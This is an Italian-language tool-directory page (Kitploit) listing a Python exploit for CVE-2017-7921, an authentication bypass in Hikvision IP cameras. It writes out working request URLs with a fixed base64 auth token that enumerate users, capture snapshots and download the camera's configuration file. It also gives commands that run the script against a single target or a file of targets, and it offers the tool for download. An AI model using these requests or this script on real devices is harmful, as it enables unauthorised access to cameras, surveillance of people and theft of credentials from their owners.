Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-7921-EXP — Exploit Python per CVE-2017-7921 nelle telecamere IP Hikvision, che esegue enumerazione utenti non autenticata, cattura di snapshot e download del file di configurazione tramite richieste HTTP appositamente create. | Kitploit
Strumenti/GitHubGitHub/blacksheepstudio/cve-2017-7921-exp
Sicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniAutenticazione
GitHubblacksheepstudio/cve-2017-7921-exp

CVE-2017-7921-EXP

Exploit Python per CVE-2017-7921 nelle telecamere IP Hikvision, che esegue enumerazione utenti non autenticata, cattura di snapshot e download del file di configurazione tramite richieste HTTP appositamente create.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
3 anni faNon ancora revisionato

CVE-2017-7921 Exploit

È stato scoperto un problema di autenticazione impropria nei dispositivi Hikvision.

​ La vulnerabilità di autenticazione impropria si verifica quando un'applicazione non autentica gli utenti in modo adeguato o corretto.

​ Ciò può consentire a un utente malintenzionato di aumentare i propri privilegi sul sistema e ottenere accesso a informazioni sensibili.

​ https://seclists.org/fulldisclosure/2017/Sep/23

​ Dettagli della vulnerabilità:

​ ----------------------

​ Recupera un elenco di tutti gli utenti e dei loro ruoli:

​ http://camera.ip/Security/users?auth=YWRtaW46MTEK

​ Ottieni un'istantanea della telecamera senza autenticazione:

​ http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

​ E, cosa peggiore, si può scaricare la configurazione della telecamera:

​ http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

Installa le dipendenze

root@kitploit:~
python3 -m pip install -r requirements.txt

Utilizzo

root@kitploit:~
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run

Schermata

Scarica lo strumento